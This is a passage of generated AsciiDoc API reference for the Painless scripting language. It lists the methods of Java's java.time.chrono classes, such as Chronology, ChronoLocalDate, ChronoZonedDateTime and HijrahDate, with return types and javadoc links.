{java11-javadoc}/java.base/java/time/chrono/Chronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-ChronoLocalDate]] -==== ChronoLocalDate -* static ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Comparator {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#timeLineOrder()[timeLineOrder]() -* Temporal 
{java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#getChronology()[getChronology]() -* Era {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ChronoLocalDate 
{java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-ChronoLocalDateTime]] -==== ChronoLocalDateTime -* static ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Comparator {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#timeLineOrder()[timeLineOrder]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#atZone(java.time.ZoneId)[atZone](ZoneId) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#compareTo(java.time.chrono.ChronoLocalDateTime)[compareTo](ChronoLocalDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#getChronology()[getChronology]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#isAfter(java.time.chrono.ChronoLocalDateTime)[isAfter](ChronoLocalDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#isBefore(java.time.chrono.ChronoLocalDateTime)[isBefore](ChronoLocalDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#isEqual(java.time.chrono.ChronoLocalDateTime)[isEqual](ChronoLocalDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toEpochSecond(java.time.ZoneOffset)[toEpochSecond](ZoneOffset) -* Instant 
{java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toInstant(java.time.ZoneOffset)[toInstant](ZoneOffset) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toLocalDate()[toLocalDate]() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toLocalTime()[toLocalTime]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDateTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-ChronoPeriod]] -==== ChronoPeriod -* static ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#between(java.time.chrono.ChronoLocalDate,java.time.chrono.ChronoLocalDate)[between](ChronoLocalDate, ChronoLocalDate) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#addTo(java.time.temporal.Temporal)[addTo](Temporal) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#get(java.time.temporal.TemporalUnit)[get](TemporalUnit) -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#getChronology()[getChronology]() -* List {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#getUnits()[getUnits]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#isNegative()[isNegative]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#isZero()[isZero]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#multipliedBy(int)[multipliedBy](int) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#negated()[negated]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#normalized()[normalized]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#subtractFrom(java.time.temporal.Temporal)[subtractFrom](Temporal) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoPeriod.html#toString()[toString]() - - -[[painless-api-reference-shared-ChronoZonedDateTime]] -==== ChronoZonedDateTime -* static ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Comparator {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#timeLineOrder()[timeLineOrder]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#compareTo(java.time.chrono.ChronoZonedDateTime)[compareTo](ChronoZonedDateTime) -* boolean 
{java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getChronology()[getChronology]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* ZoneOffset {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getOffset()[getOffset]() -* ZoneId {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isAfter(java.time.chrono.ChronoZonedDateTime)[isAfter](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isBefore(java.time.chrono.ChronoZonedDateTime)[isBefore](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isEqual(java.time.chrono.ChronoZonedDateTime)[isEqual](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toEpochSecond()[toEpochSecond]() -* Instant {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toInstant()[toInstant]() -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalDate()[toLocalDate]() -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalDateTime()[toLocalDateTime]() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalTime()[toLocalTime]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* ChronoZonedDateTime 
{java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withEarlierOffsetAtOverlap()[withEarlierOffsetAtOverlap]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withLaterOffsetAtOverlap()[withLaterOffsetAtOverlap]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withZoneSameInstant(java.time.ZoneId)[withZoneSameInstant](ZoneId) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#withZoneSameLocal(java.time.ZoneId)[withZoneSameLocal](ZoneId) - - -[[painless-api-reference-shared-Chronology]] -==== Chronology -* static Chronology {java11-javadoc}/java.base/java/time/chrono/Chronology.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static Set {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getAvailableChronologies()[getAvailableChronologies]() -* static Chronology {java11-javadoc}/java.base/java/time/chrono/Chronology.html#of(java.lang.String)[of](null) -* static Chronology {java11-javadoc}/java.base/java/time/chrono/Chronology.html#ofLocale(java.util.Locale)[ofLocale](Locale) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(int,int,int)[date](int, int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateEpochDay(long)[dateEpochDay](long) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* Era {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange 
{java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* ChronoLocalDate {java11-javadoc}/java.base/java/time/chrono/Chronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-Era]] -==== Era -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/Era.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-HijrahChronology]] -==== HijrahChronology -* static HijrahChronology {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#date(int,int,int)[date](int, int, int) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#dateEpochDay(long)[dateEpochDay](long) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null 
{java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-HijrahDate]] -==== HijrahDate -* static HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* HijrahChronology {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#getChronology()[getChronology]() -* HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean 
{java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) -* HijrahDate {java11-javadoc}/java.base/java/time/chrono/HijrahDate.html#withVariant(java.time.chrono.HijrahChronology)[withVariant](HijrahChronology) - - -[[painless-api-reference-shared-HijrahEra]] -==== HijrahEra -* static HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#AH[AH] -* static HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#of(int)[of](int) -* static HijrahEra {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#valueOf(java.lang.String)[valueOf](null) -* static HijrahEra[] {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 